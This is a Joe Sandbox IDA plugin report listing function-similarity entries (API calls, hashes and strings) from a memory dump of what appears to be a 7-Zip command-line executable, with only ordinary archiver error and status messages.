                                                                                                                                                                                                                                                  • API String ID: 1743135865-3653984579
                                                                                                                                                                                                                                                  • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                                  • Instruction ID: c97ade0243d6cd091b8c5d7c2dcaf88eb735d37e64f04339dc287fda7aac48ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501656330490091CA20EB25EC4135E6721EBC9BF4F94D321BE9E477B9EE28CA86C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2244327787-0
                                                                                                                                                                                                                                                  • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                                  • Instruction ID: 30b3364135717c16f7a9e260cf25fd36d019525bee538830725bacc70c6ae93a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA012663724061CBD7215B3DAD043697298B708BF2F908539FE4ECBB50EB28CC828781
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs
                                                                                                                                                                                                                                                  • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                                                                                                                                  • API String ID: 1795875747-932691680
                                                                                                                                                                                                                                                  • Opcode ID: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
                                                                                                                                                                                                                                                  • Instruction ID: 70debf4fc0d59f4c0d93b73f12bea00009344bbd3df14ef495e987a4d6d3c975
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101D422255904EADB18EF21ED903E87320E7C1BA1FC09422EA0D872B6DF3CCC85C742
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryRemovefree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 736856642-0
                                                                                                                                                                                                                                                  • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                                  • Instruction ID: 34fdf6b0414185cfa7e8e41381eb29be9f6a98606a232c49abbe260c8754d905
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F03627208B0181D9309B21A95133D6324A7C57F4F4482219EBD476A5DF29C946D710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00972F5B
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0097302B,?,?,?,?,00973698), ref: 00972F2C
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00972F34
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Unsupported switch postfix -stm, xrefs: 00972EF6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                                  • String ID: Unsupported switch postfix -stm
                                                                                                                                                                                                                                                  • API String ID: 3321538808-3553869907
                                                                                                                                                                                                                                                  • Opcode ID: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
                                                                                                                                                                                                                                                  • Instruction ID: 4a2356379f967cb802d958125472d718544bf7544ec0d157b9dd0ea21166a92b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79aff19e84f71c5e943c7f2cebb507195fcbf850f662f6b8687f40e2979c5786
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0F07770128586DB289F4AE4803ADA362E7C47E0F24C020DB8E07B12DE39D886CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00972AFD
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 00972ACE
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00972AD6
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrow$freemallocmemmove
                                                                                                                                                                                                                                                  • String ID: (LP-
                                                                                                                                                                                                                                                  • API String ID: 3321538808-3833670221
                                                                                                                                                                                                                                                  • Opcode ID: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
                                                                                                                                                                                                                                                  • Instruction ID: 7ebd3255b94639d5d553774739aeb3b46305c7ca354302156638caedd80fea2a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d4d380ffa6524cac6d63a35271a780ed9a8549063819f503eb306886d5a4236
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0907761124586DA289F4AE88169DB321E7C47E4F64C025DF8D07755DA39D886CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$fputcfree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3819637083-0
                                                                                                                                                                                                                                                  • Opcode ID: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
                                                                                                                                                                                                                                                  • Instruction ID: 4b5f7a917851c12016949d68b099672f92db2d0870cf1efb4f5102d3020781d6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEF0FFA661494081DA30EF2AFD5435A6321BBD9BF4F489321EEAE077A5DF28C546C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 009B3E51
                                                                                                                                                                                                                                                    • Part of subcall function 009B2B60: CompareFileTime.KERNEL32(?,?,?,00000000,009B3E64), ref: 009B2BA5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CompareFileTimememmove
                                                                                                                                                                                                                                                  • String ID: alternate streams$files$streams
                                                                                                                                                                                                                                                  • API String ID: 1303509325-806849385
                                                                                                                                                                                                                                                  • Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                                                                  • Instruction ID: dc1269654f8ad875131eb5a94b04ca76ecf78c8e15ebb8197901f4c57ca73f85
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82F0F6527105A9A2FB60EB66D615BDC6320FB85BD4FC09022BE8C07E65DF38C39AC700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32 ref: 00976676
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32 ref: 00976698
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FormatFreeLocalMessagefreememmove
                                                                                                                                                                                                                                                  • String ID: Error #
                                                                                                                                                                                                                                                  • API String ID: 2451246624-1299485822
                                                                                                                                                                                                                                                  • Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                                                                  • Instruction ID: ebd5ccff19510c16f1232b3eee6d16ea1b477b9bbb43987ab51f64f056dd564a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821EF33214A8096CB24CF16E44179D77A5F7C5BA8F84C226DA8D47B95DF78C588CB10
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: UNC
                                                                                                                                                                                                                                                  • API String ID: 0-337201128
                                                                                                                                                                                                                                                  • Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                                                                  • Instruction ID: 57d37e5b040bbc453fb605d2a65e760b3c5fe216d36358adf6224b8adf6197f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99215C37340A45C6DB29CB66E890B687368E785B98F14D027DF4D47762EB39CC85C705
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B0661
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B0680
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$freememset
                                                                                                                                                                                                                                                  • String ID: ERROR:
                                                                                                                                                                                                                                                  • API String ID: 2276422817-977468659
                                                                                                                                                                                                                                                  • Opcode ID: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
                                                                                                                                                                                                                                                  • Instruction ID: 16cd2a7d209eda0c340ca7a0414de81c50031dfcbb99df82d7efc26ca58381c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22118F63311A0482DA34EB26ED5576E6320FBC5BE0F488626EE6F4B7A2DF2CC445C340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4AA
                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0097B4F8
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                  • String ID: Path64
                                                                                                                                                                                                                                                  • API String ID: 3660427363-321863482
                                                                                                                                                                                                                                                  • Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                                                                  • Instruction ID: a7f4544dfc63c53958dd088108483b9c6c40b2c9e22b5358d3be0ee53b566e20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70214C73615640C7EB14CF25E45476E77A4F794B84F60912AEB8907BA8DB3CC885CF40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Can not open the file as archive, xrefs: 009B42D8
                                                                                                                                                                                                                                                  • Can not open encrypted archive. Wrong password?, xrefs: 009B4297
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs
                                                                                                                                                                                                                                                  • String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
                                                                                                                                                                                                                                                  • API String ID: 1795875747-2399861261
                                                                                                                                                                                                                                                  • Opcode ID: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
                                                                                                                                                                                                                                                  • Instruction ID: cc56c898ae422b28d3e379156e10c4c2e02272f59bd89be28e4d122035cce43d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80018F6232064592EF14EB2AE95079D2321EB85FE0F94D032EE0E47346CE2CC894D300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: wcscmp
                                                                                                                                                                                                                                                  • String ID: \??\
                                                                                                                                                                                                                                                  • API String ID: 3392835482-3047946824
                                                                                                                                                                                                                                                  • Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                                                                  • Instruction ID: ca7c2f9dc4ad36493f815c12690dec79369d469a517f896fb03148bc6d4d0cf7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF0307370595497CE149B2AEAA036C2321FB85B95F909832CB4E97A25DF24D4FBC314
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B2011
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputcfputs
                                                                                                                                                                                                                                                  • String ID: Scan$Scanning
                                                                                                                                                                                                                                                  • API String ID: 269475090-1436252306
                                                                                                                                                                                                                                                  • Opcode ID: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
                                                                                                                                                                                                                                                  • Instruction ID: 7e6d982fde07dc3cc5642dfd98db18419825357ca3cff58a00d9b639b0ac56ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77F0B46275154191EB11EF38CA597EC2365E750B98F488121DB0E4B165DF28C8C6C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocExceptionStringThrow
                                                                                                                                                                                                                                                  • String ID: out of memory
                                                                                                                                                                                                                                                  • API String ID: 3773818493-2599737071
                                                                                                                                                                                                                                                  • Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
                                                                                                                                                                                                                                                  • Instruction ID: 7a3c00d7c3b953e8c13cabd8fac930ffe5792e84b3e7e8294fcca9673983a167
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
